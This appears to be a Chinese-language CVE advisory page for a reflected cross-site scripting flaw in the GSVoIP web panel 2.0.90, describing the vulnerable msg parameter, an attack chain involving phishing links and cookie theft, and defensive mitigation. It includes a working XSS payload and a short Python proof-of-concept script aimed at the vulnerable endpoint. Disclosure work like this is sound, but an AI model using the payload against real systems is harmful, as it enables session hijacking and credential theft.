CVE-2025-69606 CVSS 6.1 中危

CVE-2025-69606 GSVoIP Web面板跨站脚本漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-69606

漏洞类型

跨站脚本 (XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GSVoIP web panel

漏洞概述

GSVoIP web面板 2.0.90版本被发现存在跨站脚本（XSS）安全漏洞。问题的根源在于`/painel/gateways.php/error`接口的`msg`参数缺乏足够的输入验证和输出编码机制。远程攻击者可以通过精心构建特制的恶意URL链接，诱导受害者进行访问。一旦受害者点击链接，注入的恶意JavaScript代码将在其浏览器上下文中执行，进而引发会话劫持、数据窃取或网络钓鱼等一系列客户端攻击行为。

技术细节

该漏洞属于反射型跨站脚本。漏洞触发点位于GSVoIP web panel的`/painel/gateways.php/error`接口。当服务器处理该端点的请求时，会将GET请求参数`msg`的值未经任何安全过滤直接嵌入到返回的HTML页面源码中。由于应用程序未对特殊字符进行HTML实体编码，导致攻击者可以注入恶意的JavaScript代码。攻击者通过构造特定的Payload，例如`</script><script>alert(document.domain)</script>`，可以闭合原有的上下文并插入新的脚本标签。由于漏洞无需认证即可利用，攻击者常结合社会工程学手段，将包含恶意参数的URL发送给目标用户。一旦受害者点击链接，恶意脚本将在其浏览器环境中以当前用户的权限运行，进而窃取Cookie、Session Token等敏感凭据，或重定向至钓鱼网站，严重威胁客户端安全。

攻击链分析

STEP 1

侦查

攻击者识别目标系统正在使用GSVoIP web panel 2.0.90版本，并确认其存在未经过滤的msg参数接口。

STEP 2

构造攻击载荷

攻击者编写包含恶意JavaScript代码的URL，利用`</script><script>`闭合原有标签并插入 Payload。

STEP 3

社会工程学投递

攻击者通过电子邮件或即时通讯工具，将包含恶意参数的URL发送给目标用户，诱导其点击。

STEP 4

触发漏洞

受害者点击链接，浏览器向服务器发送请求，服务器将未过滤的参数值反射回HTML响应。

STEP 5

执行恶意代码

受害者的浏览器解析响应内容并执行注入的JavaScript脚本，导致弹窗或Cookie窃取等行为。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2025-69606
# Target: GSVoIP web panel 2.0.90
# Endpoint: /painel/gateways.php/error

import requests

def exploit_xss(target_url):
    # Payload to close existing script tag and inject alert
    payload = "</script><script>alert(document.domain)</script>"
    
    # Construct the full URL with the vulnerable parameter
    params = {'msg': payload}
    
    try:
        response = requests.get(target_url, params=params, timeout=5)
        if response.status_code == 200:
            print(f"[+] Request sent to: {response.url}")
            print("[+] Check the browser for an alert box showing the domain.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://target-ip/painel/gateways.php/error"
    exploit_xss(target)

影响范围

GSVoIP web panel 2.0.90

防御指南

临时缓解措施

建议管理员立即检查并修补`/painel/gateways.php/error`接口的输入过滤逻辑；在未修复前，用户应谨慎点击来源不明的链接，避免在登录状态下访问可疑URL。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表